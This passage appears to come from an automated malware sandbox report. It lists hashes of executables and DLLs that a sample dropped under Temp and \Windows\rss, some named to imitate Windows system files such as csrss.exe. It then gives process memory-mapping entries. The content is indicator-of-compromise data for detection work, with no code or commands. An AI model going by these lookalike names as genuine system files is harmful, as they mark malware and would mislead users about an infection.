        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        MD5

        9a4b7b0849a274f6f7ac13c7577daad8

        SHA1

        51219052fd31598113d1f30d938a560dd1434163

        SHA256

        c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

        SHA512

        cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

      • \Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        MD5

        9a4b7b0849a274f6f7ac13c7577daad8

        SHA1

        51219052fd31598113d1f30d938a560dd1434163

        SHA256

        c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

        SHA512

        cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

      • \Users\Admin\AppData\Local\Temp\dbghelp.dll
        MD5

        f0616fa8bc54ece07e3107057f74e4db

        SHA1

        b33995c4f9a004b7d806c4bb36040ee844781fca

        SHA256

        6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

        SHA512

        15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
        MD5

        1afff8d5352aecef2ecd47ffa02d7f7d

        SHA1

        8b115b84efdb3a1b87f750d35822b2609e665bef

        SHA256

        c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

        SHA512

        e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\osloader.exe
        MD5

        e2f68dc7fbd6e0bf031ca3809a739346

        SHA1

        9c35494898e65c8a62887f28e04c0359ab6f63f5

        SHA256

        b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

        SHA512

        26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      • \Users\Admin\AppData\Local\Temp\symsrv.dll
        MD5

        5c399d34d8dc01741269ff1f1aca7554

        SHA1

        e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

        SHA256

        e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

        SHA512

        8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

      • \Windows\rss\csrss.exe
        MD5

        160dd398272fd4fdf51f410adad9a51b

        SHA1

        f49489e7960978dd7dbb1784b0c67b1fd540926d

        SHA256

        2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

        SHA512

        8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

      • \Windows\rss\csrss.exe
        MD5

        160dd398272fd4fdf51f410adad9a51b

        SHA1

        f49489e7960978dd7dbb1784b0c67b1fd540926d

        SHA256

        2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

        SHA512

        8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

      • memory/328-48-0x0000000000000000-mapping.dmp
      • memory/528-59-0x0000000000000000-mapping.dmp
      • memory/604-49-0x0000000000000000-mapping.dmp
      • memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmp
        Filesize

        4.6MB

      • memory/680-47-0x0000000000000000-mapping.dmp
      • memory/692-12-0x0000000004FB0000-0x0000000004FC1000-memory.dmp
        Filesize

        68KB

      • memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmp
        Filesize

        8.1MB

      • memory/796-57-0x0000000000000000-mapping.dmp
      • memory/796-46-0x0000000000000000-mapping.dmp
      • memory/816-44-0x0000000000000000-mapping.dmp
      • memory/828-53-0x0000000000000000-mapping.dmp
      • memory/904-72-0x0000000000400000-0x0000000000AB6000-memory.dmp
        Filesize

        6.7MB

      • memory/904-70-0x0000000000000000-mapping.dmp
      • memory/908-123-0x0000000000000000-mapping.dmp
      • memory/952-10-0x0000000000000000-mapping.dmp
      • memory/1056-54-0x0000000000000000-mapping.dmp
      • memory/1140-56-0x0000000000000000-mapping.dmp
      • memory/1164-3-0x0000000000000000-mapping.dmp
      • memory/1212-50-0x0000000000000000-mapping.dmp
      • memory/1248-45-0x0000000000000000-mapping.dmp
      • memory/1260-39-0x000007FEF6F80000-0x000007FEF71FA000-memory.dmp
        Filesize

        2.5MB

      • memory/1344-52-0x0000000000000000-mapping.dmp
      • memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmp
        Filesize

        8.1MB

      • memory/1492-51-0x0000000000000000-mapping.dmp
      • memory/1500-55-0x0000000000000000-mapping.dmp
      • memory/1568-16-0x0000000000000000-mapping.dmp
      • memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmp
        Filesize

        8.5MB

      • memory/1584-23-0x0000000003480000-0x0000000003491000-memory.dmp
        Filesize

        68KB

      • memory/1584-21-0x0000000000000000-mapping.dmp
      • memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmp
        Filesize

        1.9MB

      • memory/1588-97-0x0000000000000000-mapping.dmp
      • memory/1608-64-0x0000000000000000-mapping.dmp
      • memory/1648-5-0x0000000004E80000-0x0000000004E91000-memory.dmp
        Filesize

        68KB

      • memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmp
        Filesize

        8.5MB

      • memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmp
        Filesize

        8.4MB

      • memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmp
        Filesize

        8.5MB

      • memory/1648-2-0x0000000074D11000-0x0000000074D13000-memory.dmp
        Filesize

        8KB

      • memory/1724-65-0x0000000000000000-mapping.dmp
      • memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmp
        Filesize

        8.1MB

      • memory/1900-80-0x0000000000000000-mapping.dmp
      • memory/2020-74-0x0000000000000000-mapping.dmp
      • memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmp
        Filesize

        8.1MB

      • memory/2024-17-0x0000000000000000-mapping.dmp
      • memory/2024-18-0x000007FEFB631000-0x000007FEFB633000-memory.dmp
        Filesize

        8KB

      • memory/2120-111-0x0000000000400000-0x00000000007FD000-memory.dmp
        Filesize

        4.0MB

      • memory/2120-109-0x0000000000000000-mapping.dmp
      • memory/2192-112-0x0000000000000000-mapping.dmp
      • memory/2192-124-0x00000000033F0000-0x00000000033F1000-memory.dmp
        Filesize

        4KB

      • memory/2220-115-0x0000000000000000-mapping.dmp
      • memory/2220-119-0x0000000000400000-0x00000000007FB000-memory.dmp
        Filesize

        4.0MB

      • memory/2260-117-0x0000000000000000-mapping.dmp
      • memory/2328-121-0x0000000000000000-mapping.dmp